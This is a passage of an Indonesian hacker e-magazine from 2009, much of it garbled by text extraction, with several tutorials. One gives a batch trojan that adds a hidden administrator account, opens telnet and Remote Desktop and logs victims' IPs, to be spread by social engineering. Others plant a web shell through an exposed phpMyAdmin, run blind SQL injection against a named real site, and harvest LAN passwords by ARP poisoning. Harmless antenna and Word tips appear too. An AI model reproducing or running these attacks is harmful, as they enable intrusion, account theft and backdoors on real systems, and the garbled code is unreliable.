+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ @echo off net user eminem /add /expires:never net localgroup administrators eminem /add echo Windows Registry Editor Version 5.00> c:\winst.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SOFTWARE\Microsof INE\SOFTWARE\Microsoft\Windows t\Windows NT\CurrentVersion\Winlogon\SpecialAcc NT\CurrentVersion\Win logon\SpecialAccounts\UserList]>> ounts\UserList]>> c:\winst.reg echo "eminem"=dword:0 "eminem"=dword:00000000>> 0000000>> c:\winst.reg REGEDIT /S c:\winst.REG DEL c:\winst.REG @echo off @echo REGEDIT4>user1.reg REGEDIT4>user1.reg echo. >>user1.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon [HKEY_LOCAL_MACHINE\S YSTEM\CurrentControlSet\Services\Tlnt trolSet\Services\TlntSvr]>>user1. Svr]>>user1. reg echo. >>user1.reg echo "ErrorControl"=d "ErrorControl"=dword:00000001>>u word:00000001>>user1.reg ser1.reg echo "Start"=dword:00 "Start"=dword:00000002>>user1. 000002>>user1.reg reg echo "Type"=dword:000 "Type"=dword:00000010>>user1.r 00010>>user1.reg eg @echo off echo "FailureAction " FailureActions& s& quot;=hex#58;00,00,00,00,00,00,00 quot;=hex#58;00,00, 00,00,00,00,00,00,00,00,00,00,03, ,00,00,00,00,00,03,00,00,00,38,65 00,00,00,38,65,11, ,11, 00,01,00,0 0,00,60,ea,00,00,01,00,00,00,60,ea,00 0,00,60,ea,00,00,01 ,00,00,00,60,ea,00,00,01,00,00,00,6 ,00,01,00,00,00,60,ea,00,00>>user 0,ea,00,00>>user 1.reg echo. >>user1.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsof [HKEY_LOCAL_MACHINE\S OFTWARE\Microsoft\TelnetServer\1.0]>> t\TelnetServer\1.0]>>user1.reg user1.reg echo. >>user1.reg echo "NTLM"=dword:000 "NTLM"=dword:00000001>>user1.r 00001>>user1.reg eg echo "TelnetPort"=dwo "TelnetPort"=dword:29A>>user1. rd:29A>>user1.reg reg echo off regedit /s user1.reg echo off del user1.reg @echo off echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon INE\SYSTEM\CurrentControlSet\Control\Te trolSet\Control\Terminal rminal Server]>> c:\TS.reg echo "fDenyTSConnecti "fDenyTSConnections"=dword:000 ons"=dword:00000000>> 00000>> c:\TS.reg echo "fAllowToGetHelp"= "fAllowToGetHelp"=dword:00000001 dword:00000001>> >> c:\TS.reg regedit /s c:\TS.reg del c:\TS.reg


- 40-


@echo off echo Windows Registry Editor Version 5.00> c:\TS2.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon [HKEY_LOCAL_MACHINE\S YSTEM\CurrentControlSet\Services\Term trolSet\Services\TermService]>> Service]>> c:\TS2.reg echo "Start"=dword: " Start"=dword:00000002>> 00000002>> c:\TS2.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon INE\SYSTEM\CurrentControlSet\Control\Te trolSet\Control\Terminal rminal Server]>> c:\TS2.reg echo "AllowTSConnecti "AllowTSConnections"=dword:000 ons"=dword:00000001>> 00001>> c:\TS2.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon INE\SYSTEM\CurrentControlSet\Control\Te trolSet\Control\Terminal rminal Server]>> c:\TS2.reg echo "fDenyTSConnection "fDenyTSConnections"=dword:00000000 s"=dword:00000000>> >> c:\TS2.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon INE\SYSTEM\CurrentControlSet\Control\Te trolSet\Control\Terminal rminal Server]>> c:\TS2.reg echo "fAllowToGetHelp "fAllowToGetHelp"=dword:000000 "=dword:00000001>> 01>> c:\TS2.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SOFTWARE\Microsof INE\SOFTWARE\Microsoft\Windows t\Windows NT\CurrentVersion\Winlogon]>> NT\CurrentVersion\Win logon]>> c:\TS2.reg echo "AllowMultipleTS "AllowMultipleTSSessions"=dwor Sessions"=dword:00000001>> d:00000001>> c:\TS2.reg c :\TS2.reg echo [HKEY_LOCAL_MACH [HKEY_LOCAL_MACHINE\SOFTWARE\Microsof INE\SOFTWARE\Microsoft\Windows t\Windows NT\CurrentVersion\Winlogon]>> NT\CurrentVersion\Win logon]>> c:\TS2.reg echo "AutoAdminLogo " AutoAdminLogon"="1">> n"="1">> c:\TS2.reg REGEDIT /S C:\TS2.REG REGEDIT -S C:\TS2.REG echo [Components] > c:\bootlog~.txt c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL c:\TS2.REG DEL c:\bootlog~.txt @start /b "iexplore.exe" "iexplore.exe" www.hackers-center.org Exit

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Nb : di wajibkan untuk mengedit source di atas  , karena nick saya terlalu ganteng. . 

Perhatikan pada bagian , berikut ini . net user eminem /add /expires:ne /expires:never ver net localgroup administrators eminem /add

akan menambahkan user eminem echo "TelnetPort" "TelnetPort"=dword:29A =dword:29A>>user1.reg >>user1.reg


- 41-


akan membuka telnet port 666 [karena 29A adalah hasil hex dari 666] untuk merubahnya anda bisa mencoba menggunakan calculator, Run – Calc

Lihat gambar di bawah ini :

Cukup merubah Dec ke Hex


- 42-


Dan pada bagian : @start /b "iexplore.exe" www.hackers-center.org Apabila victim mengklik file bat ini akan membuka www.hackers-center.org yang gunanya untuk merecord IP sang victim  Source Record Ip kira² seperti ini . +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

' '>'..$_SERVER $_SERVER[['REMOTE_ADDR' 'REMOTE_ADDR']. ].'' '';; $fp = fopen fopen(($logfile $logfile,, "a" "a"); ); fwrite(($fp fwrite $fp,, $logdetails $logdetails); ); fwrite(($fp fwrite $fp,, "
" "
"); ); fclose(($fp fclose $fp); ); ?> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ NB : silakan mengeditnya apabila saya terlalu tampan 

Ok sekarang kita mulai cara membuatnya, copy paste code bat pertama kedalam notepad dan save dengan ekstensi bat [jangan lupa edit bagian2 pentingnya saja seperti user , port , rec IP ].

[anda bisa merubahnya dengan exstensi exe menggunakan tools seperti bat2exe yang bisa

di download di http://www.battoexe.com ] setelah itu silakan anda sebarkan file bat atau exe tadi di jagad maya ini atau anda bisa melakukan percobaan dengan teman anda  , yeah tentunya menggunakan tehnik soceng , dan yang lbh asiknya tidak 1 AV pun berhasil membacanya sebagai malicious code . setelah itu anda hanya perlu mengecek site record IP yang anda buat tadi  dan anda bisa meremote melalui telnet dengan port 666 [ saya pernah mencobanya dengan Remote Dekstop dan berhasil  ] Ok sekian artikel dari orang tampan seperti saya  Terima kasih . Thanks to My Brotherhood : bob , zeth , oki , pizzy , agus , jack , revan ,dan brotherhood lainnya  jangan pernah biarkan otak mu sadar teman.


- 43-


Antena ASTRO Holic Antena Astro Holic Writer : root ([email protected] [email protected])) Disini kita memanfaatkan sebuah Disc ASTRO yang sudah ga dipakai lagi, daripada kebuang sia-sia mendingan kita pakai buat antena WiFi. Kita siapkan bahan-bahan bahan- bahan dulu….. Bahan yang dibutuhkan adalah: 1. Pipa PVC ukuran 3”, panjang 24cm 2. Tutup pralon / dop pipa ukuran 3” 2buah 3. Tutup pralon / dop pipa ukuran 1” 1buah 4. Mur Baut panjang 2cm 5. Alumunium foil 6. USB WiFi 7. Kabel UTP panjang max 15 Meter 8. Kabel sambungan USB Bahan yang utama untuk membuat Antena adalah poin 1 – 6, jika sudah mempunyai kabel perpanjangan perpanjangan USB tidak perlu menyiapkan poin 7 & 8. Langsung aja kita praktek…… a. Ambil dop pipa ukuran 3” & 1”, kita lubang pas ditengah seukuran baut yg sudah kita siapkan. Lalu kita tempelkan secara berlawanan & baut kencang k encang kedua dop pipa tersebut.


- 44-


b. Lapisi bagian dalam dop ukuran 3” dengan alumunium foil.

c. Selanjutnya ambil pralon pvc 3”, lubangi seukuran slot USB untuk memasukk an USB WiFinya, ukuran 5cm dari bibir pralon. Dan buat garis 19cm dari bibir tersebut untuk area alumuniumfoil.


- 45-


d. Masukkan USB WiFinya kedalam pralon lalu tutup dengan dop yang telah kita buat tadi. Dop yang ada lapisan alumunium foilnya pasang d i sebelah paling dekat dengan lubang USB. Ingat!! Dop paling ujung jangan dilapisi alumunium….. alumunium….. e. Pasang rangkaian pralon tadi pada tangkai antena ASTRO yang telah kita siapkan.

Selesai sudah prakaria kita, saatnya ujicoba scan sinyal dengan s oftware “Network Stumbler”.


- 46-


Hasil dari scan sinyal……

Nah selamat berkarya, kalo ada yang bisa bikin lebih sensitif lagi silahkan di share… Kita kembangkan cara ini, siapa tau bisa ngalahin antena GRID pabrikan hehehehehee… root@HC A.K.A chepoek [email protected] foto lebih komplit ada disini http://dl.getdropbox.com/u/324971/antena/foto.html


- 47-


PhpMyAdmin Vulnerability Getting Windows Shell with phpMyAdmin Writer : Coco_nk4l ([email protected] [email protected])) Gw yakin kalo banyak dari loe semua dah pada tau apa itu namanya shell??? Yups bagi gw shell adalah Backdoor buat system pada suatu site, bayangin loe gak perlu tau password dr cpanel, loe bisa cari tw passwordnya, lo bisa utak utik file managernya nambah file ato hapus file atau deface tugh site sekalian, pada umumnya shell sering kita jumpai dengan system operasi Linux, walaupun gak menutup kemungkinan shell yang kita dapetin adalah basis Windows, nah pertanyaan gimana cara bedainnya antara tugh shell pake OS windows ato pake OS linux??? Yang membedakan yaitu pada bagian uname-a akan terdapat jenis windows yg di pake kalo kalian menggunakan shell dengan jenis (c99), disini gw gak bakalan jelasin secara detail apaan itu shell, fungsinya apaan aja, tp dsini gw Cuma ingin share pengetahuan gw tentang gimana cara dapet Shell windows menggunakan kelemahan ato vulnerability dari phpmyadmin dan xampp, langsung aja kita coba…

Yang harus loe siapkan : PC dengan Koneksi Internet tentunya Kesabaran Script Shell yang udah di encode menjadi base64 kalian bisa ambil di http://geocities.com/kyo2_2004/alat/shell_64.txt ’ Pengetahuan ttg google dork untuk variasi target  Kopi plus rokok n camilan kalo perlu Yang pertama kita lakukan setelah semua kebutuhan terpenuhi yaitu, kita musti cari target dahulu, pertama coba lakukan pencarian target dengan bantuan paman Google, Dork yang kita gunakan adalah Inurl:/xampp/lang.php? bisa juga kita variasi untuk ke suatu Negara tertentu saja.


- 48-


Setelah melakukan pencarian coba aja kita cari target, kali ini gwa kasih contoh targetnya adalah.. http://racewarz.org/xampp/lang.php?it

Kita lihat diatas adalah tampilan dari phpmyadmin phpmyadmin dari site http://racewarz.org/ Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 49-


Nah kalo udah dsana ada Tulisan phpmyadmin, coba loe buka apakah bisa kita akses secara langsung atokah harus make login, ternyata gak perlu login kita dah bisa masuk kedalam phpmyadmin yang bentuknya kurang lebih seperti gambar di bawah ini

Setelah kita masuk phpmyadmin kita buka Querywindow yang di wakili ama icon kotak bertuliskan SQL. Dan akan muncul popup seperti berikut

Dalam popup itu kita bisa inject perintah2 SQL, nah disini silahkan kalian masukan code seperti ini : SELECT “script shell hasil encode” INTO OUTFILE ” lokasi DOCUMENT_ROOT(htdocs)”


- 50-


Ket: Lokasi htdocs : lokasi dimana isi dari semua site tersimpan cara untuk mengetahuinya yaitu dengan cara membuka halaman phpinfo http://www.racewarz.org/xampp/ph http://www.racewarz .org/xampp/phpinfo.php pinfo.php ato bisa juga klik tul isan phpinfo() pada tampilan phpmyadmin, yang hasilnya kurang lebih seperti ini

Nah kalo udah hasil script yang kita masukan kedalam Query window adalah sebagai berikut:

SELECT INTO “isi script shell” INTO OUTFILE "C:/xampp/htdocs/hc.php"

Penjelasan: Isi script shell gak gw tulis soalnya terlalu banyak




- 51-


Nah dsana ada c:/xampp/htdocs dimana itu adalah lokasi DOCUMENT_ROOT DOCUMENT_ROOT ato lokasi file2 web di simpan, Dan hc.php adalah nama file dari shell yang gw tanam.

Kalo udah tekan tombol GO

Dan kita tunggu sesaat sampe proses dari phpmyadmin selesai kalo udah semua prosesnya, kita bakalan lead hasilnya Di http://www.racewarz.org/hc.php dan hasilnya adalah seperti gabar di bawah:


- 52-


Shell windows dah di tanggan, untuk command2 yang di pake berbeda dengan shell Linux, command yang akan kita pakai yaitu command yang sama seperti kita gunain CMD ato Ms Dos. Oke, sekian dulu goresan tangan gw semoga bisa menambah pengetahuan loe semua tantang namanya seucurity dalam Web ato dunia bawah tanah. Moga loe semua gak bosen dengan tulisan gw, sekali lagi terima kasih

Salam

Coco A.K.A Nk4l

Hackers-Center

Balikita

Yogyafree

HD Team

| UnderDos | MetroPolix | R00t | Niko A.K.A Biadabz | AK-47 AK-47|| GT-5 GT-5|| |inc0mp13te | X-shadow | Jeje | Ramz | Agitama | Gorontalo Defacer | | Indonesi Indonesian an Coder | Cukdu$ Crew | Tuban Hackerlink | Deantique |


- 53-


Sniffing Jaringan with Cain & Abel Mengintip Password Orang dalam Jaringan Writer : phychole ([email protected]) Welcome, salam kenal. Ini tutorial yang udah basi. Ini aku peruntukan untuk yang baru mengenal jaringan jadi untuk para master numpang nulis dan kalo ada kesalahan mohon bimbingannya. Cain merupakan tools lengakap untuk berbagai aktifitas. Kali ini saya akan memberi tutorial tentang sniffing menggunakan Cain & Abel. Yang kalian butuhkan yaitu: 1. Software Cain&Abel (bisa di cari digoogle udah bertebaran atau langsung ke home nya di www.oxid.it 2. Komputer yang terhubung dengan LAN (Bisa di Lab Internet, Warnet, Kantor, maupun Hotspot area) 3. Kopi panas/The anget (yang penting minuman yang kalian suka biar ga haus) 4. Camilan(yang bisa dimakan nemani saat sniffing) 5. Teman yang asik (bisa cewek atau yang lain) Oke sudah lengkap khan???? Kita mulai, saya anggap kalian sudah mendapatkan Cain&Abel sekarang yang mesti kalian lakukan membuka file tersebut. EIts…… tunggu dulu matikan antivirus yang berjalan agar Cain&Abel tidak dimakan oleh antivirus yang bangsat tersebut. Karena kita disini ga mengenal antivirus. Kwkwkkwkwkw

Klik dua kali untuk memulai instalasi

Ikuti petunjuk yang ada. Kalo nggak ngerti bahasa inggris kayak aku ya klik aja yang ada tulisannya NEXT ampe ketemu tulisan FINISH berarti kita udah sukses. Ini kita diminta install Wincap yang emang sudah disertakan satu paket dengan Cain & Abel itu sendiri. Apabila kita tidak install maka Cain & Abel tidak akan berjalan. Namun apabila anda sudah menginstall tools yang lain dan menyertakan Wincap maka anda tidak usah mengisntall Wincap kembali. Untuk Instalasi tetap masih seperti yang pertama klik next sampai ketemu finish.


- 54-


Oke sekarang selesai lah semua. Kita sudah bisa menggunakan Cain & Abel kita. Cara memanggil program ini sama dengan program aplikasi yang lain. Kalian tinggal cari shortcut Cain & Abel ini. Klik Start >> all Program >> Cain >> Cain

Ini adalah tampilan awal kita masuk ke dalam Cain & Abel. Langkah selanjutnya adalah kita perlu untuk mengkonfigurasi Cain & Abel dengan Hardware kita. Bisa LanCard ataupun wireless.


- 55-


Klik Configure maka akan muncul jendela baru seperti diatas. Pilih IP address yang koneksi dengan computer lain. Kemudian klik Apply dan OK

.

Selanjutnya kita Aktif kan Cain & Abel dengan klik tombol

Selanjutnya klik Tombol

+

yang ada di toolbar

maka akan muncul jendela baru MAC Address Scanner. Ini berfungsi mencari MAC Address atau alamat computer yang terkoneksi dengan jaringan kita. Klik OK


- 56-


Maka akan muncul MAC Address komputer lain. Kalo lebih dari satu itu pertanda baik bagi kita. Karena sniffing lebih seru kalo komputer lebih dari satu. Selanjutnya klik tombol APR yang ada di bagian bawah

akan muncul jendela baru. jendela APR langkah selanjutnya klik di colom Status kemudian klik tombol

baru


Setelah masuk ke

+ akan muncul jendela

- 57-


Klik no IP server yang di sebelah kiri ( biasanya 192.168.0.1 atau yang akhir nya angka 1 itu pasti server ) akan muncul IP di table sebelah kanan blok semua IP tersebut dan klik OK. Aktifkan APR

dengan klik tanda bulat warna kuning di bagian atas toolbar. Maka akan muncul status baru di table bawah, jika berwarna hijau maka ada yang koneksi dengan internet. Kalngak selanjutnya adalah kita masuk ke jendela password dengan klik tab Password yang ada di bagian bawah.

Akan muncul banyak tulisan di situ. Kalian tinggal nunggu aja dan sesekali mengecek. Setiap ada yang membuka web dan membutuhkan LOGIN maka akan muncul username dan Passwordnya. Ini merupakan cara termudah kita mendapatkan Username dan Password di LAN. Yang telah berhasil saya temukan yakni password untuk Friedster, Yahoo mail & Messenger, Blogspot dan account – account lainnya. So selamat memanen password di tempat LAN favorite kalian  Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 58-


Selain mencari password dan username untuk masuk website, kita juga bisa menemukan password admin server LAN yang kita gunakan. Dan banyak lagi fungsi dari Cain & Abel ini kalian tinggal mencari tutorial yang lebih lengkap di GOOGLE dengan tag “cain&abel”. Sekian dari saya. phychole Attention: Tujuan dari saya menulis artikel ini adalah untuk sharing ilmu yang telah saya miliki. Phychole tidak bertanggung jawab atas penyalah gunaan atas yang anda lakukan. Segala resiko yang akan anda temukan silahkan anda selesaikan sendiri. Apabila ada pertanyaan saran dan kritik silahkan hubungi saya. Create on Wednesday, March 18, 2009 on my place by phychole Email : [email protected] [email protected],, YM : phychole , phy_chole FS: www.friendster.com/phychole Special thaks :

My friends

-

Allah SWT

-

Stressdesign

-

My Family

-

Blue_right

-

Oxid.it

-

Ari_87yanto

-

Yogyafree Community

-

^nd3s0^

-

Google

-

Ghozt

………..Thanks to all reader …….


- 59-


Blind Injection Exploit Web with Blind SQL Injection Writer : omicron9194 ([email protected] [email protected])) Blind Injection? Yupz itu salah satu teknik serangan hacker. Omicron akan menjelaskan sesimple mungkin ttg blind injection ini, yg dulunya omicron anggap rumit banget. Stop! bukan bermaksud utk ngajarin temen2,tapi omicron berusaha memberikan apa yg omicron punya meskipun masih sedikit. Bermula dari coba-coba mencari teknik baru (padahal ini kan teknik teknik lama? Wkwk :p) jadi omicron mencoba dgn teknik ini (just for learn), ga ada maksud utk deface ato apalah. OK,ini alamatnya : http://cmc.msc.com.my/event_detail.php?ID=190 langsung test vulnerable nya http://cmc.msc.com.my/event_detail.php?ID=190 and 1=1 <<< True http://cmc.msc.com.my/event_detail.php?ID=190 and 1=2 <<< False Setelah yakin bahwa site itu ada vulnerablenya,langsung vulnerablenya,langsung kita inject http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65) Nah lho,,bingung ? Sama, omicron juga bingung.OK,omicron bingung.OK,omicron jelasin dikit. # mid(user()1,1) >>> dalam masalah ini,omicron ini,omicron tidak mengetahui mengetahui value ato nilai dari user itu apa, maka dalam "()" omicron sengaja kosongkan # 1,1 >>> urutan dari value tsb # CHAR >>> peubah dalam desimal # 65 >>> value desimal tsb dan 65 adalah "A" dalam ASCII ASCII jadi omicron mengawalinya mengawalinya dengan "A" >> 65 dalam ASCII , bisa di awali dari apa aja,tapi utk lebih valid,omicron mengawali dgn huruf "A" >>> 65 Setelah kita masukkan URL tadi,,apa yg akan di tampilkan ? Yupz,nilainya ada 2,True or False. True >>> jika halamannya menampilkan dalam keadaan normal (berita,gambar,etc .. tidak hilang) False >>> jika halamannya tidak menampilkan sebagian ato seluruh isi dari halaman tsb (berita,gambar,etc .. ada yg hilang) http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65) <<< false Hackers-Center Hackers- Center © 2009 – HC eMagazine Vol. 02

- 60-


http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(66) <<< false http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(67) <<< true yeah,akhirnya mendapat nilai true di char 67,dalam ASCII adalah karakter C cari nilai kedua >>> http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,2)=char(67,65) <<< false liat 1,1 nya , udah diganti sama 1,2. Jadi klo udah dapet true lagi,ganti aja menjadi 1,3 ; 1,4 ; dst... Nah,akhirnya omicron dapet nilai true yg kedua : http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,2)=char(67,82) pada angka 82 >>> R dalam ASCII Lanjut sampe halaman tsb bernilai false dan akan mendapatkan : http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(user(),1,10)=char(67,82,69,83,84,81,95,67,7 7,68) 67 = C 82 = R 69 = E 83 = S 84 = T 81 = Q 95 = _ 67 = C 77 = M 68 = D Nah itu usernamenya >>> CRESTQ_CMD CRESTQ_CMD klo mw cari password nya >>> value user() ganti jadi >>> database() , dan dilakukan sama dengan cara di atas : http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(database(),1,12)=char(67,82,69,83,84,81,95 ,67,77,68,68,66) 67 = C 82 = R 69 = E 83 = S 84 = T 81 = Q 95 = _ 67 = C 77 = M 68 = D 68 = D 66 = B


- 61-


Password yg di dapat >>> CRESTQ_CMDDB Jadi user dan passwordnya >>> CRESTQ_CMD dan CRESTQ_CMDDB sep dah.selesain kan.xixixii...ternyata kan.xixixii...ternyata ga terlalu rumit yg omicron bayangkan,tapi,,,harus bayangkan,tapi,,,harus ada waktu panjang utk blind injection ini,sabar aja ok. Inget! Yang omicron exploit itu belum tentu user dan pass adminnya.Tergantung dari web yg kita exploit. Thx buat Cyber*Z_Camel yg udah ngasih target dan berusaha menjawab pertanyaan2 cupu omicron. Semoga penjelasan omicron bermanfaat :) Oia, untuk menngenal kode ASCII ,, siapa tau ga berguna...xixixixi..... berguna...xixixixi..... http://ciebal.web.id/char.txt


- 62-


Hack Shortcut Mozilla Menjahili Orang dengan Shortcut Mozilla Writer : Chazali Husni ([email protected] [email protected])) Wah…. Senang sekali ni karena pada akhirnya zal i bisa ikut menulis tentang hacking, y,...

meskipun ini merupakan tekhnik lama. Tapi bagi yang sudah tau teknik ini, tlong diacuhkan saja dan bagi teman2 yang belum tau silahkan mencoba. Biasanya zali melakukan ini di fasilitas internet kampus, kalau mereka tidak mau masuk kuliah gara2 internet… ( zali tidak bertanggung jawab atas penyalah gunaan tekhnik ini..) Oke, kita langsung ke RED ZONE Z ONE (maksudnya, kita praktekan,..hehehehe….)

Pertama, kita cari targetnya yaitu Shortcut Mozilla Firefox bs juga yang lain ( zali, ngehack firefox karena agar teman2 zali berhenti main internet) Kedua, klik kanan pada Shortcut…kayak gini ni…

Ketiga, pada target yang saya lingkari dengan garis merah pada gambar diatas....Kita ganti dengan Shutdown –s –c ”Ga boleh lagi maen disini...” – t 50


- 63-


Nah, pasti teman2 pada bertanya2 maksud dari script tersebut apa, tetapi bagi yang sudah tau pasti dong tau.. Oke zali akan jelasin sedikit... ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Shutdown -s : sebagai perintah untuk mematikan sistem komputer -c : sebagai pesan, terserah terserah kita mau buat apa. Tapi jangan lupa diapit oleh tanda kutip --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Eits,,,,jangan Eits,,,,jangan lupa klik kli k Ok setelah itu.. Nah...nantinya jadinya akan seperti ini... TEDENG>>>>>

Nah...sekian dulu tulisan dari zali... Sekedar informasi, pesan yang nantinya tidak akan bisa kita matikan dengan mengklik ”x” ataupun

menggunakan Task Manager... Manager... A: Jadi Bagaimana matikannya? Z: Hehehe... masalah itu kita bahas di tulisan berikutnya..


- 64-


Terima kasih kepada Allah SWT yang telah memberikan kesehatan dan PC buat zali, kepada kedua orang tua dan pacar q yang mendukungku... mendukungku... dan Mohon maaf atas kekurangan dari dari tulisan ini Biodata

Nama : Chazali Husni YM

: [email protected]

Blog

: chazalihusni.blogspot. chazalihusni.blogspot.com com

FS

: [email protected]

NB:

Penulis tidak bertanggung jawab atas penyalah gunaan tekhnik ini, Hacking is not crime


- 65-


Dummy Text MS Word 2007 Karakter Rahasia pada Microsoft Word 2007 Writer : ciebal ([email protected] [email protected])) Para programmer dalam membuat program tentu harus membuat programnya dengan unik untuk membuktikan bahwa program yang dibuat adalah hasil karyanya. Pada Microsoft Microsoft Office 2007 ternyata para programmernya membuat hal unik yang tidak banyak orang tau dan saya sendiri mengetahuinya dari salah satu trainer sertifikasi CEH, Microsoft, Oracle, dll di bandung. Waktu itu saya tanya tentang karakter rahasia di notepad tapi dia menujukan beberapa keunikan dari Microsoft Word 2007 (saya belum coba di MS Word 2003) dan kali ini saya coba shre 3 karakter tersebut yang sering disebut dengan Dummy Text karena memang tidak ada manfaat dan artinya. Xixixixixi Oke deh langsung aja ada 3 dummy text yang ciebal tau yaitu : 1. Ketikan teks di bawah ini pada halaman microsoft word 2007 kamu. =lorem() Tekan Enter dan contoh hasilnya sebagai berikut ini:

Artinya apa yah..? saya juga gak tau, namanya juga dummy text.. :P 2. Sama dengan cara pertama, hanya yang kita ketikan adalah a dalah teks berikut ini. =rand() Tekan Enter dan hasilnya sebagai berikut:


- 66-


Nah klo yang ini sedikit dimengerti karena bahasa inggris, kamu tinggal buka transtool aja... xixixixi 3. Sama seperti sebelumnya, sekarang kamu ketik text berikut ini : =rand.old() Tekan Enter dan hasilnya sebagi berikut:

Dummy teks yang ini biasanya digunakan sebagai contoh kalimat pada saat pemilihan Font di sistem operasi Windows. Lalu apa manfaatnya..? yah gak ada manfaatnya, tapi setidaknya kamu sekarang mengetahui sedikit rahasia MS Word 2007. Kamu bisa mengubah dummy text tersebut dengan sedikit variasi. Sebagai contoh, jika kita mengetikkan =rand(3,5) maka Word akan menyisipkan teks sebanyak 3 paragraf dimana masing-masing paragraf terdiri dari 5 baris kalimat. Kok gak bisa sih di Word 2007 saya..? Secara default fasilitas ini sudah aktif. Jika ternyata setelah kita ketikan cara-cara diatas ternyata tidak terjadi apapun, kemungkinan adalah fitur Replace text as you type berada dalam kondisi non-aktif. Untuk mengaktifkannya, mengaktifkannya, caranya sebagai berikut: Klik Office Button yang ada di sudut kiri atas bidang aplikasi Word.

Pilih Word Options >> Proofing >> AutoCorrect Options.


- 67-


Pilih tab AutoCorrect. Lalu aktifkan replace text as you type.

Ok lah, sekian dulu artikel saya yang gak jelas ini, dan semoga jadi bertambah ilmu kita walaupun hanya sedikit.  Untuk mengetahui lebih jelas tentang dummy text ini bisa dibaca di situs resmi

Microsoft nya.

http://support.microsoft.com/kb/212251

/Nick at Forum : ciebal /Location : Banten - Bandung /Email : [email protected] or [email protected] /Web: www.ciebal.web.id | www.indoblogger.web.id /Thanks to :

Allah SWT, My Family, All Al l My Friends, HC Staff, Indoblogger Community, omicron9194, eminem, Paluared JS, Blackpaper, Quatum.Byte, chuwey, kemangi, aris lesmana, xyberbreaker, All Reader, etc.. Tengkyu semuanya yang gak bisa disebutin satu-persatu.


- 68-


HC eMagazine Writer Ketentuan Menjadi Penulis HC eMagazine Berminat menjadi menjadi penulis di HC eMagazine eMagazine edisi berikutnya? Apabila anda anda berminat jangan ragu-ragu untuk mengirimkan artikel anda ke redaksi HC eMagazine. Artikel harus asli tulisan anda, kalaupun itu bukan buatan anda harus mencantumkan sumber asli anda mendapatkan artikel tersebut. silahkan kirim artikel anda dengan ketentuan sebagai berikut : Materi yang ditentukan : Kategori Komputer & Internet Kategori Pemograman / Coding Kategori Hacking & Cracking Kategori Phising & Phreaking Kategori Handphone Kirimkan tulisan anda dengan format : Format File : .doc atau .docx Page Setup : Paper size = Letter atau A4 Line spacing : single Font : Arial atau Calibri, size 12 Kirimkan tulisan ke Redaksi HC eMagazine e Magazine : 1. [email protected] 2. [email protected] 3. [email protected] 4. [email protected] Subject : HC eMagazine Attachment : JudulTutorAnda.zip atau JudulTutorAnda.rar (pilih salah satu saja). Tidak menerima file download di ziddu, rapidshare, 4shared, dll. (jika ukurannya besar di perbolehkan disimpan di hosting seperti ripway, fileAve, Geocities, dll) Artikel akan diseleksi. Jika sesuai dengan kriteria, maka akan kami publish di HC eMagazine edisi berikutnya. Redaksi HC berhak mengedit isi tulisan sesuai ses uai kebutuhan. Terima kasih.

Redaksi HC eMagazine


- 69-


Lampiran : Serba – Serbi HC eMagazine Kopdar Staff HC & Redaksi HC eMagazine di Bandung (Dago Plaza).. Silahkan Tebak Siapa Aja tuh Disitu.. :P


- 70-


Donasi Logo Donasi Dari Cybernet


Hacking Billing Explorer – Hal 9 Remote

Recommend Documents